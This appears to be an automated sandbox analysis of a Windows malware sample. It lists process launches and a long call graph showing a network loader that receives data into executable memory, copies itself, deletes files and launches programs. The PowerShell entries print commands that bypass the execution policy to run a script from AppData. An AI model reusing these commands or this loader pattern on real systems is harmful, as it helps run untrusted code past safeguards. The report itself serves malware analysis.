                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:18
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:19
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                                                                          Imagebase:0xe50000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:20
                                                                                                                          Start time:23:38:46
                                                                                                                          Start date:03/01/2025
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                                                                          Imagebase:0xe50000
                                                                                                                          File size:433'152 bytes
                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:16.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:3.6%
                                                                                                                            Total number of Nodes:1374
                                                                                                                            Total number of Limit Nodes:7
                                                                                                                            execution_graph 10355 2620032 10365 2620ae4 GetPEB 10355->10365 10358 2620ae4 GetPEB 10361 26202a7 10358->10361 10359 26204a6 GetNativeSystemInfo 10360 26204d3 VirtualAlloc 10359->10360 10362 2620a9c 10359->10362 10363 26204ec 10360->10363 10361->10359 10361->10362 10363->10362 10367 10015df0 10363->10367 10366 262029b 10365->10366 10366->10358 10375 10015820 10367->10375 10370 10015e20 CloseHandle exit 10372 10015e6e 10370->10372 10371 10015e37 GetCurrentThread WaitForSingleObject CreateThread 10432 10015490 WSAStartup getaddrinfo 10371->10432 11555 1000b570 10371->11555 10372->10362 10376 10015860 10375->10376 10450 10015750 GetModuleFileNameA 10376->10450 10378 10015876 10462 10015450 10378->10462 10382 100158d2 10468 10002cb0 10382->10468 10384 10015973 10385 1001597b 10384->10385 10389 100159a2 _Smanip _Error_objects 10384->10389 10386 10002cb0 _invalid_parameter_noinfo_noreturn 10385->10386 10387 1001598a 10386->10387 10388 10002cb0 _invalid_parameter_noinfo_noreturn 10387->10388 10421 1001599c CreateMutexA GetLastError 10388->10421 10471 10012640 10389->10471 10393 10015b57 _Smanip _Error_objects 10394 10012640 9 API calls 10393->10394 10395 10015bda 10394->10395 10396 10005400 9 API calls 10395->10396 10397 10015bf1 10396->10397 10481 10013890 10397->10481 10400 10002cb0 _invalid_parameter_noinfo_noreturn 10401 10015c42 10400->10401 10484 10012620 10401->10484 10404 10002cb0 _invalid_parameter_noinfo_noreturn 10405 10015c60 10404->10405 10406 10012620 _invalid_parameter_noinfo_noreturn 10405->10406 10407 10015c6f memset 10406->10407 10487 10002b60 10407->10487 10409 10015cc0 ShellExecuteExA 10410 10015d13 10409->10410 10411 10015ceb 10409->10411 10414 10002cb0 _invalid_parameter_noinfo_noreturn 10410->10414 10412 10015d11 10411->10412 10413 10015cf4 WaitForSingleObject CloseHandle 10411->10413 10416 10015700 9 API calls 10412->10416 10413->10412 10415 10015d22 10414->10415 10417 10002cb0 _invalid_parameter_noinfo_noreturn 10415->10417 10420 10015d55 10416->10420 10418 10015d31 10417->10418 10419 10002cb0 _invalid_parameter_noinfo_noreturn 10418->10419 10419->10421 10422 10015d72 CopyFileA 10420->10422 10421->10370 10421->10371 10423 10002cb0 _invalid_parameter_noinfo_noreturn 10422->10423 10424 10015d84 ShellExecuteA 10423->10424 10489 10001660 GetModuleHandleA 10424->10489 10427 10002cb0 _invalid_parameter_noinfo_noreturn 10428 10015db3 10427->10428 10429 10002cb0 _invalid_parameter_noinfo_noreturn 10428->10429 10430 10015dc2 10429->10430 10431 10002cb0 _invalid_parameter_noinfo_noreturn 10430->10431 10431->10421 10433 10015509 WSACleanup exit 10432->10433 10443 10015522 10432->10443 10434 100156ed exit 10433->10434 10434->10372 10435 100155c5 freeaddrinfo 10439 100155d9 WSACleanup exit 10435->10439 10445 100155f2 10435->10445 10436 1001553d socket 10437 10015566 WSACleanup exit 10436->10437 10438 1001557f connect 10436->10438 10437->10434 10440 100155a3 closesocket 10438->10440 10441 100155be 10438->10441 10439->10434 10440->10443 10441->10435 10442 100155f9 recv 10444 10015671 10442->10444 10442->10445 10443->10435 10443->10436 10447 10015677 10444->10447 10448 1001567b closesocket WSACleanup free exit 10444->10448 10445->10442 10446 10015646 realloc 10445->10446 10449 100156b8 VirtualAlloc memcpy 10445->10449 10446->10445 10447->10449 10448->10434 10449->10434 10519 10002da0 10450->10519 10455 100157b7 10527 10002ad0 10455->10527 10456 100157e9 10460 10002cb0 _invalid_parameter_noinfo_noreturn 10456->10460 10459 10002cb0 _invalid_parameter_noinfo_noreturn 10461 100157e4 10459->10461 10460->10461 10461->10378 10596 10015400 10462->10596 10465 10015700 GetModuleFileNameA 10466 10002da0 8 API calls 10465->10466 10467 10015733 10466->10467 10467->10382 10601 10003230 10468->10601 10470 10002cbf 10470->10384 10472 10012660 HandleT 10471->10472 10619 10013cd0 10472->10619 10474 10012699 10475 10005400 10474->10475 10476 10005431 _Error_objects 10475->10476 10653 100127e0 10476->10653 10478 10005455 HandleT 10479 1000549d 10478->10479 10660 100128b0 10478->10660 10479->10393 10707 10014400 10481->10707 10483 100138b2 10483->10400 10485 100130b0 _invalid_parameter_noinfo_noreturn 10484->10485 10486 1001262f 10485->10486 10486->10404 10488 10002b6f Concurrency::task_continuation_context::task_continuation_context 10487->10488 10488->10409 10490 10002da0 8 API calls 10489->10490 10491 100016a3 10490->10491 10731 10001510 10491->10731 10495 100016d1 10496 10002cb0 _invalid_parameter_noinfo_noreturn 10495->10496 10497 100016dc 10496->10497 10498 10002cb0 _invalid_parameter_noinfo_noreturn 10497->10498 10499 100016ee 10498->10499 10743 10001430 10499->10743 10503 10001723 10759 10003bc0 10503->10759 10505 10001748 10506 10002cd0 _invalid_parameter_noinfo_noreturn 10505->10506 10507 1000175c 10506->10507 10508 10002cb0 _invalid_parameter_noinfo_noreturn 10507->10508 10509 10001767 10508->10509 10510 10002cb0 _invalid_parameter_noinfo_noreturn 10509->10510 10511 10001776 10510->10511 10512 10002cb0 _invalid_parameter_noinfo_noreturn 10511->10512 10513 10001788 CreateThread RegisterClassW GetSystemMetrics GetSystemMetrics 10512->10513 10762 10001580 10513->10762 10924 10005760 10513->10924 10515 1000182f CreateWindowExW ShowWindow 10516 1000188a KiUserCallbackDispatcher 10515->10516 10517 100018b5 10516->10517 10518 1000189e TranslateMessage DispatchMessageW 10516->10518 10517->10427 10518->10516 10520 10002dd1 HandleT _Error_objects 10519->10520 10531 10003ee0 10520->10531 10522 10002dfa 10523 10002b10 10522->10523 10524 10002b22 Concurrency::task_continuation_context::task_continuation_context 10523->10524 10573 10003dc0 10524->10573 10526 10002b55 10526->10455 10526->10456 10528 10002ae8 _Error_objects 10527->10528 10585 100035a0 10528->10585 10532 10003ef7 Concurrency::task_continuation_context::task_continuation_context 10531->10532 10534 10003f01 Concurrency::task_continuation_context::task_continuation_context 10532->10534 10542 10001410 ?_Xlength_error@std@@YAXPBD 10532->10542 10535 10003f2b 10534->10535 10537 10003f77 Concurrency::task_continuation_context::task_continuation_context 10534->10537 10543 100036d0 memcpy 10535->10543 10544 100048e0 10537->10544 10539 10003f9e HandleT Concurrency::task_continuation_context::task_continuation_context 10547 100036d0 memcpy 10539->10547 10541 10003f4f HandleT _Error_objects Concurrency::task_continuation_context::task_continuation_context 10541->10522 10542->10534 10543->10541 10548 10004a70 10544->10548 10547->10541 10551 10004ac0 10548->10551 10552 10004ad0 allocator 10551->10552 10555 10004af0 10552->10555 10556 10004905 10555->10556 10557 10004afd 10555->10557 10556->10539 10558 10004b14 10557->10558 10559 10004b06 10557->10559 10570 10001350 10558->10570 10562 10004b70 10559->10562 10563 10004b87 10562->10563 10564 10004b8c 10562->10564 10565 100012c0 allocator _CxxThrowException 10563->10565 10566 10001350 allocator _callnewh malloc _CxxThrowException _CxxThrowException 10564->10566 10565->10564 10567 10004b96 10566->10567 10568 10004ba4 _invalid_parameter_noinfo_noreturn 10567->10568 10569 10004bb3 10567->10569 10568->10567 10568->10568 10569->10556 10571 10015fe6 allocator _callnewh malloc _CxxThrowException _CxxThrowException 10570->10571 10572 1000135c 10571->10572 10572->10556 10574 10003e1f _Min_value 10573->10574 10575 10003dd3 10573->10575 10574->10526 10575->10574 10579 10003e90 memset 10575->10579 10577 10003de8 10577->10574 10580 10004860 10577->10580 10579->10577 10581 100048b6 10580->10581 10583 1000486c _Min_value 10580->10583 10581->10574 10583->10581 10584 100049b0 memchr 10583->10584 10584->10583 10586 100035d5 10585->10586 10591 10003980 10586->10591 10588 100035ee Concurrency::task_continuation_context::task_continuation_context 10589 10003ee0 8 API calls 10588->10589 10590 10002afd 10589->10590 10590->10459 10592 10003992 10591->10592 10593 10003997 10591->10593 10595 10003a70 ?_Xout_of_range@std@@YAXPBD 10592->10595 10593->10588 10595->10593 10600 100153f0 10596->10600 10598 1001541d __stdio_common_vsprintf 10599 10015439 10598->10599 10599->10465 10600->10598 10602 10003247 _Error_objects Concurrency::task_continuation_context::task_continuation_context 10601->10602 10604 10003278 Concurrency::task_continuation_context::task_continuation_context 10602->10604 10605 10003910 10602->10605 10604->10470 10608 10003a90 10605->10608 10611 10004340 10608->10611 10610 1000393b 10610->10604 10612 10004361 10611->10612 10614 1000436e _MallocaArrayHolder 10611->10614 10615 10001370 10612->10615 10614->10610 10616 100013ae 10615->10616 10617 100013bc _invalid_parameter_noinfo_noreturn 10616->10617 10618 100013cb 10616->10618 10617->10616 10617->10617 10618->10614 10620 10013cf6 Concurrency::task_continuation_context::task_continuation_context 10619->10620 10621 10013d70 _Error_objects 10620->10621 10627 10014390 10620->10627 10621->10474 10628 1001439f 10627->10628 10629 100143a9 10628->10629 10641 10013090 ?_Xlength_error@std@@YAXPBD 10628->10641 10642 10014860 10629->10642 10633 10014ec0 10634 10014ee4 HandleT 10633->10634 10646 100152a0 10634->10646 10636 10013d51 10637 10014230 10636->10637 10638 10014249 10637->10638 10639 1001423f 10637->10639 10638->10621 10649 100130b0 10639->10649 10641->10629 10643 10014893 Concurrency::task_continuation_context::task_continuation_context 10642->10643 10644 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10643->10644 10645 10013d29 10644->10645 10645->10633 10647 100152af 10646->10647 10648 100152cd memcpy 10647->10648 10648->10636 10651 100130d6 _Error_objects Concurrency::task_continuation_context::task_continuation_context 10649->10651 10650 10013139 10650->10638 10651->10650 10652 10003a90 allocator _invalid_parameter_noinfo_noreturn 10651->10652 10652->10650 10654 100127f6 10653->10654 10659 100127f4 10653->10659 10655 1001280e 10654->10655 10657 1001283c Concurrency::task_continuation_context::task_continuation_context 10654->10657 10654->10659 10664 10013ed0 10655->10664 10657->10659 10677 100131d0 10657->10677 10659->10478 10661 10012914 10660->10661 10663 100128cd Concurrency::task_continuation_context::task_continuation_context 10660->10663 10689 10013fe0 10661->10689 10663->10478 10665 10013ef0 Concurrency::task_continuation_context::task_continuation_context 10664->10665 10667 10013efd Concurrency::task_continuation_context::task_continuation_context 10665->10667 10683 10001410 ?_Xlength_error@std@@YAXPBD 10665->10683 10668 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10667->10668 10669 10013f37 HandleT _Error_objects 10668->10669 10670 10013f6c HandleT 10669->10670 10671 10013faf 10669->10671 10684 10012860 10670->10684 10672 10012860 memcpy 10671->10672 10675 10013fa2 Concurrency::task_continuation_context::task_continuation_context 10672->10675 10675->10659 10676 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 10676->10675 10678 100131e7 HandleT _Error_objects 10677->10678 10688 100036d0 memcpy 10678->10688 10680 10013223 Concurrency::task_continuation_context::task_continuation_context 10681 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 10680->10681 10682 10013245 10681->10682 10682->10659 10683->10667 10687 100036d0 memcpy 10684->10687 10686 1001287b 10686->10676 10687->10686 10688->10680 10690 10014000 Concurrency::task_continuation_context::task_continuation_context 10689->10690 10692 1001400d Concurrency::task_continuation_context::task_continuation_context 10690->10692 10702 10001410 ?_Xlength_error@std@@YAXPBD 10690->10702 10693 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10692->10693 10694 10014047 HandleT _Error_objects 10693->10694 10695 100140c4 10694->10695 10696 1001407c HandleT 10694->10696 10697 10012940 Concurrency::task_continuation_context::task_continuation_context memcpy 10695->10697 10703 10012940 10696->10703 10701 100140b7 Concurrency::task_continuation_context::task_continuation_context 10697->10701 10699 100140a6 10700 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 10699->10700 10700->10701 10701->10663 10702->10692 10706 100036d0 memcpy 10703->10706 10705 1001295a Concurrency::task_continuation_context::task_continuation_context 10705->10699 10706->10705 10708 1001442c _Error_objects Concurrency::task_continuation_context::task_continuation_context 10707->10708 10709 100144c7 _Error_objects Concurrency::task_continuation_context::task_continuation_context 10708->10709 10710 10014518 Concurrency::task_continuation_context::task_continuation_context 10708->10710 10725 100036d0 memcpy 10709->10725 10712 100145d3 Concurrency::task_continuation_context::task_continuation_context 10710->10712 10714 10014568 HandleT _Error_objects 10710->10714 10717 100145ee Concurrency::task_continuation_context::task_continuation_context 10712->10717 10728 10001410 ?_Xlength_error@std@@YAXPBD 10712->10728 10726 100039e0 memcpy 10714->10726 10716 100145a9 Concurrency::task_continuation_context::task_continuation_context 10727 100036d0 memcpy 10716->10727 10718 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10717->10718 10720 1001462d HandleT Concurrency::task_continuation_context::task_continuation_context 10718->10720 10729 100036d0 memcpy 10720->10729 10722 1001467a Concurrency::task_continuation_context::task_continuation_context 10730 100036d0 memcpy 10722->10730 10724 10014507 _Error_objects 10724->10483 10725->10724 10726->10716 10727->10724 10728->10717 10729->10722 10730->10724 10732 10002b10 2 API calls 10731->10732 10733 1000152c 10732->10733 10734 10001535 10733->10734 10735 10001558 10733->10735 10736 10002ad0 9 API calls 10734->10736 10776 10002e20 10735->10776 10738 1000154a 10736->10738 10739 10002cd0 10738->10739 10740 10002ce2 HandleT Concurrency::task_continuation_context::task_continuation_context 10739->10740 10741 10003230 _invalid_parameter_noinfo_noreturn 10740->10741 10742 10002cea 10740->10742 10741->10742 10742->10495 10794 10002ec0 10743->10794 10745 1000146b SHGetKnownFolderPath 10746 100014e7 10745->10746 10747 1000149a wcstombs 10745->10747 10796 10002c90 10746->10796 10748 10002da0 8 API calls 10747->10748 10750 100014c2 10748->10750 10752 10002cd0 _invalid_parameter_noinfo_noreturn 10750->10752 10751 100014f4 10756 10003b90 10751->10756 10753 100014d1 10752->10753 10754 10002cb0 _invalid_parameter_noinfo_noreturn 10753->10754 10755 100014d9 CoTaskMemFree 10754->10755 10755->10751 10825 10002c20 10756->10825 10758 10003ba7 10758->10503 10857 10002c50 10759->10857 10761 10003bd7 10761->10505 10763 100015a2 10762->10763 10766 100015d9 _Error_objects 10762->10766 10872 10015f82 AcquireSRWLockExclusive 10763->10872 10765 100015ac 10765->10766 10877 1001631a 10765->10877 10861 10003ac0 10766->10861 10771 10001629 10865 10002980 10771->10865 10773 1000163a 10869 10002960 10773->10869 10775 10001642 10775->10515 10777 10002e4c HandleT Concurrency::task_continuation_context::task_continuation_context 10776->10777 10780 10004020 10777->10780 10779 10002e9e 10779->10738 10781 10004037 Concurrency::task_continuation_context::task_continuation_context 10780->10781 10783 10004041 Concurrency::task_continuation_context::task_continuation_context 10781->10783 10791 10001410 ?_Xlength_error@std@@YAXPBD 10781->10791 10784 1000406b 10783->10784 10786 1000409b Concurrency::task_continuation_context::task_continuation_context 10783->10786 10792 100036d0 memcpy 10784->10792 10787 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10786->10787 10788 100040c2 HandleT Concurrency::task_continuation_context::task_continuation_context 10787->10788 10793 100036d0 memcpy 10788->10793 10790 1000408d _Error_objects 10790->10779 10791->10783 10792->10790 10793->10790 10795 10002ef1 _Error_objects 10794->10795 10795->10745 10799 100032c0 10796->10799 10800 100032d0 HandleT 10799->10800 10803 10003850 10800->10803 10802 10002ca3 10802->10751 10804 100038a8 10803->10804 10806 10003864 Concurrency::task_continuation_context::task_continuation_context 10803->10806 10810 10004270 10804->10810 10809 100039e0 memcpy 10806->10809 10808 10003889 Concurrency::task_continuation_context::task_continuation_context 10808->10802 10809->10808 10811 10004281 Concurrency::task_continuation_context::task_continuation_context 10810->10811 10812 1000428b Concurrency::task_continuation_context::task_continuation_context 10811->10812 10820 10001410 ?_Xlength_error@std@@YAXPBD 10811->10820 10814 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10812->10814 10815 100042bc HandleT _Error_objects 10814->10815 10821 100038d0 10815->10821 10817 100042f9 10818 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 10817->10818 10819 10004313 Concurrency::task_continuation_context::task_continuation_context 10817->10819 10818->10819 10819->10808 10820->10812 10824 100036d0 memcpy 10821->10824 10823 100038ea Concurrency::task_continuation_context::task_continuation_context 10823->10817 10824->10823 10826 10002c30 HandleT 10825->10826 10829 100032f0 10826->10829 10828 10002c49 10828->10758 10830 1000335d 10829->10830 10832 10003310 Concurrency::task_continuation_context::task_continuation_context 10829->10832 10836 10004150 10830->10836 10835 100039e0 memcpy 10832->10835 10834 1000333b Concurrency::task_continuation_context::task_continuation_context 10834->10828 10835->10834 10837 10004170 Concurrency::task_continuation_context::task_continuation_context 10836->10837 10839 1000417d Concurrency::task_continuation_context::task_continuation_context 10837->10839 10849 10001410 ?_Xlength_error@std@@YAXPBD 10837->10849 10840 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 10839->10840 10841 100041b7 HandleT _Error_objects 10840->10841 10842 10004237 10841->10842 10843 100041ec HandleT 10841->10843 10844 10003390 memcpy 10842->10844 10850 10003390 10843->10850 10847 1000422a Concurrency::task_continuation_context::task_continuation_context 10844->10847 10846 10004219 10848 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 10846->10848 10847->10834 10848->10847 10849->10839 10855 100036d0 memcpy 10850->10855 10852 100033aa 10856 100036d0 memcpy 10852->10856 10854 100033c1 Concurrency::task_continuation_context::task_continuation_context 10854->10846 10855->10852 10856->10854 10858 10002c6a Concurrency::task_continuation_context::task_continuation_context 10857->10858 10859 100032f0 10 API calls 10858->10859 10860 10002c7d 10859->10860 10860->10761 10863 10003af5 HandleT 10861->10863 10862 10003b32 10862->10771 10863->10862 10881 100046f0 10863->10881 10867 10002992 HandleT Concurrency::task_continuation_context::task_continuation_context 10865->10867 10866 1000299a 10866->10773 10867->10866 10868 10002fb0 _invalid_parameter_noinfo_noreturn 10867->10868 10868->10866 10870 10002fb0 _invalid_parameter_noinfo_noreturn 10869->10870 10871 1000296f 10870->10871 10871->10775 10873 10015f96 10872->10873 10874 10015f9b ReleaseSRWLockExclusive 10873->10874 10919 10015fd1 SleepConditionVariableSRW 10873->10919 10874->10765 10920 100162ec 10877->10920 10880 10015f31 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 10880->10766 10882 1000471c Concurrency::task_continuation_context::task_continuation_context 10881->10882 10884 1000475c 10882->10884 10889 10001410 ?_Xlength_error@std@@YAXPBD 10882->10889 10886 1000477f _Error_objects Concurrency::task_continuation_context::task_continuation_context 10884->10886 10890 10004820 10884->10890 10893 10004990 10886->10893 10889->10884 10897 10004a50 10890->10897 10894 1000499f 10893->10894 10896 10004801 10893->10896 10909 10002fb0 10894->10909 10896->10862 10900 10004a90 10897->10900 10905 10004b30 10900->10905 10903 10004af0 allocator 6 API calls 10904 10004845 10903->10904 10904->10886 10906 10004aa0 10905->10906 10907 10004b4a 10905->10907 10906->10903 10908 100012c0 allocator _CxxThrowException 10907->10908 10908->10906 10910 10002fc7 _Error_objects Concurrency::task_continuation_context::task_continuation_context 10909->10910 10912 10002ff8 10910->10912 10913 100037c0 10910->10913 10912->10896 10916 10003a50 10913->10916 10917 10004340 allocator _invalid_parameter_noinfo_noreturn 10916->10917 10918 100037eb 10917->10918 10918->10912 10919->10873 10921 10016302 _register_onexit_function 10920->10921 10922 100162fb _crt_atexit 10920->10922 10923 100015cc 10921->10923 10922->10923 10923->10880 10925 10005798 10924->10925 10926 10002da0 8 API calls 10925->10926 10927 100057ae 10926->10927 10928 10002e20 8 API calls 10927->10928 10929 100057c5 _Smanip _Error_objects 10928->10929 10930 10012640 9 API calls 10929->10930 10931 10005e28 _Smanip _Error_objects 10930->10931 10932 10012640 9 API calls 10931->10932 10933 1000a1cb 10932->10933 10934 10005400 9 API calls 10933->10934 10935 1000a1e2 10934->10935 10936 10005400 9 API calls 10935->10936 10937 1000a1fc _Error_objects 10936->10937 11204 10004fe0 10937->11204 10940 10002cd0 _invalid_parameter_noinfo_noreturn 10941 1000a253 10940->10941 10942 10002cb0 _invalid_parameter_noinfo_noreturn 10941->10942 10943 1000a25e 10942->10943 10944 10004fe0 17 API calls 10943->10944 10945 1000a272 10944->10945 10946 10002cd0 _invalid_parameter_noinfo_noreturn 10945->10946 10947 1000a28d 10946->10947 10948 10002cb0 _invalid_parameter_noinfo_noreturn 10947->10948 10949 1000a298 GetTempPathA 10948->10949 10951 10002da0 8 API calls 10949->10951 10952 1000a373 _Smanip _Error_objects 10951->10952 10953 10012640 9 API calls 10952->10953 10954 1000a3fc 10953->10954 10955 10005400 9 API calls 10954->10955 10956 1000a413 10955->10956 10957 10012620 _invalid_parameter_noinfo_noreturn 10956->10957 10958 1000a425 10957->10958 10959 10002e20 8 API calls 10958->10959 10960 1000a44b 10959->10960 11228 10005250 10960->11228 10962 1000a457 _Smanip _Error_objects 10963 10012640 9 API calls 10962->10963 10964 1000a50d 10963->10964 10965 10005400 9 API calls 10964->10965 10966 1000a524 10965->10966 11235 100138d0 10966->11235 10968 1000a557 10969 10002cb0 _invalid_parameter_noinfo_noreturn 10968->10969 10970 1000a569 10969->10970 10971 10012620 _invalid_parameter_noinfo_noreturn 10970->10971 10972 1000a578 10971->10972 11238 10005520 DeleteFileA 10972->11238 10974 1000a58a 10975 10002da0 8 API calls 10974->10975 10976 1000a5a4 10975->10976 11240 10005300 10976->11240 10979 10002cb0 _invalid_parameter_noinfo_noreturn 10980 1000a5cd Sleep 10979->10980 10981 1000a5e5 10980->10981 10982 10002da0 8 API calls 10981->10982 10983 1000a5f1 _Smanip _Error_objects 10982->10983 10984 10012640 9 API calls 10983->10984 10985 1000a666 10984->10985 10986 10005400 9 API calls 10985->10986 10987 1000a67d 10986->10987 10988 10002e20 8 API calls 10987->10988 10989 1000a6c7 10988->10989 10990 10005250 13 API calls 10989->10990 10991 1000a6d3 10990->10991 10992 10002cb0 _invalid_parameter_noinfo_noreturn 10991->10992 10993 1000a6eb 10992->10993 10994 10012620 _invalid_parameter_noinfo_noreturn 10993->10994 10995 1000a6fa 10994->10995 10996 10002cb0 _invalid_parameter_noinfo_noreturn 10995->10996 10997 1000a709 10996->10997 10998 10002da0 8 API calls 10997->10998 10999 1000a721 _Smanip _Error_objects 10998->10999 11000 10012640 9 API calls 10999->11000 11001 1000a79a 11000->11001 11002 10005400 9 API calls 11001->11002 11003 1000a7b1 11002->11003 11004 10002e20 8 API calls 11003->11004 11005 1000a7fb 11004->11005 11006 10005250 13 API calls 11005->11006 11007 1000a807 11006->11007 11008 10002cd0 _invalid_parameter_noinfo_noreturn 11007->11008 11009 1000a82e 11008->11009 11010 10002cb0 _invalid_parameter_noinfo_noreturn 11009->11010 11011 1000a839 11010->11011 11012 10002cb0 _invalid_parameter_noinfo_noreturn 11011->11012 11013 1000a848 11012->11013 11014 10012620 _invalid_parameter_noinfo_noreturn 11013->11014 11015 1000a857 11014->11015 11016 10002cb0 _invalid_parameter_noinfo_noreturn 11015->11016 11017 1000a866 11016->11017 11251 100139a0 11017->11251 11021 1000a8ad 11022 10013a30 9 API calls 11021->11022 11023 1000a8db 11022->11023 11024 10013a30 9 API calls 11023->11024 11025 1000a909 11024->11025 11026 10013a30 9 API calls 11025->11026 11027 1000a937 11026->11027 11028 10013a30 9 API calls 11027->11028 11029 1000a965 11028->11029 11030 10013a30 9 API calls 11029->11030 11031 1000a993 11030->11031 11032 10013a30 9 API calls 11031->11032 11033 1000a9c1 11032->11033 11034 10013a30 9 API calls 11033->11034 11035 1000a9ef 11034->11035 11036 10013a30 9 API calls 11035->11036 11037 1000aa1d 11036->11037 11038 10013a30 9 API calls 11037->11038 11039 1000aa4b 11038->11039 11040 10013a30 9 API calls 11039->11040 11041 1000aa79 11040->11041 11042 10002cb0 _invalid_parameter_noinfo_noreturn 11041->11042 11043 1000aa8b 11042->11043 11044 10002cb0 _invalid_parameter_noinfo_noreturn 11043->11044 11045 1000aa9a 11044->11045 11046 10002cb0 _invalid_parameter_noinfo_noreturn 11045->11046 11047 1000aaa9 11046->11047 11048 10002cb0 _invalid_parameter_noinfo_noreturn 11047->11048 11049 1000aab8 11048->11049 11050 10002cb0 _invalid_parameter_noinfo_noreturn 11049->11050 11051 1000aac7 11050->11051 11052 10002cb0 _invalid_parameter_noinfo_noreturn 11051->11052 11053 1000aad6 11052->11053 11054 10002cb0 _invalid_parameter_noinfo_noreturn 11053->11054 11055 1000aae5 11054->11055 11056 10002cb0 _invalid_parameter_noinfo_noreturn 11055->11056 11057 1000aaf4 11056->11057 11058 10002cb0 _invalid_parameter_noinfo_noreturn 11057->11058 11059 1000ab03 11058->11059 11060 10002cb0 _invalid_parameter_noinfo_noreturn 11059->11060 11061 1000ab12 11060->11061 11062 10002cb0 _invalid_parameter_noinfo_noreturn 11061->11062 11063 1000ab21 11062->11063 11064 10005520 DeleteFileA 11063->11064 11065 1000ab33 11064->11065 11066 10002da0 8 API calls 11065->11066 11067 1000ab4d 11066->11067 11068 10005300 31 API calls 11067->11068 11069 1000ab64 11068->11069 11070 10002cb0 _invalid_parameter_noinfo_noreturn 11069->11070 11071 1000ab76 Sleep 11070->11071 11072 1000ab8e _Smanip _Error_objects 11071->11072 11073 10012640 9 API calls 11072->11073 11074 1000addd 11073->11074 11075 10005400 9 API calls 11074->11075 11076 1000adf4 _Smanip _Error_objects 11075->11076 11077 10012640 9 API calls 11076->11077 11078 1000ae9a 11077->11078 11079 10005400 9 API calls 11078->11079 11080 1000aeb1 11079->11080 11081 10013890 9 API calls 11080->11081 11082 1000aef0 11081->11082 11083 10002cb0 _invalid_parameter_noinfo_noreturn 11082->11083 11084 1000af02 11083->11084 11085 10012620 _invalid_parameter_noinfo_noreturn 11084->11085 11086 1000af11 11085->11086 11087 10002cb0 _invalid_parameter_noinfo_noreturn 11086->11087 11088 1000af20 11087->11088 11089 10012620 _invalid_parameter_noinfo_noreturn 11088->11089 11090 1000af2f 11089->11090 11091 1000af3d WinExec Sleep 11090->11091 11092 1000af5b _Smanip _Error_objects 11091->11092 11093 10012640 9 API calls 11092->11093 11094 1000b07c 11093->11094 11095 10005400 9 API calls 11094->11095 11096 1000b093 11095->11096 11097 10012620 _invalid_parameter_noinfo_noreturn 11096->11097 11098 1000b0a5 _Smanip _Error_objects 11097->11098 11099 10012640 9 API calls 11098->11099 11100 1000b118 11099->11100 11101 10005400 9 API calls 11100->11101 11102 1000b12f 11101->11102 11103 10003bc0 10 API calls 11102->11103 11104 1000b162 11103->11104 11105 10003b90 10 API calls 11104->11105 11106 1000b1a1 11105->11106 11107 10002cd0 _invalid_parameter_noinfo_noreturn 11106->11107 11108 1000b1bc 11107->11108 11109 10002cb0 _invalid_parameter_noinfo_noreturn 11108->11109 11110 1000b1c7 11109->11110 11111 10002cb0 _invalid_parameter_noinfo_noreturn 11110->11111 11112 1000b1d6 11111->11112 11113 10002cb0 _invalid_parameter_noinfo_noreturn 11112->11113 11114 1000b1e5 11113->11114 11115 10012620 _invalid_parameter_noinfo_noreturn 11114->11115 11116 1000b1f4 memset 11115->11116 11117 10002b60 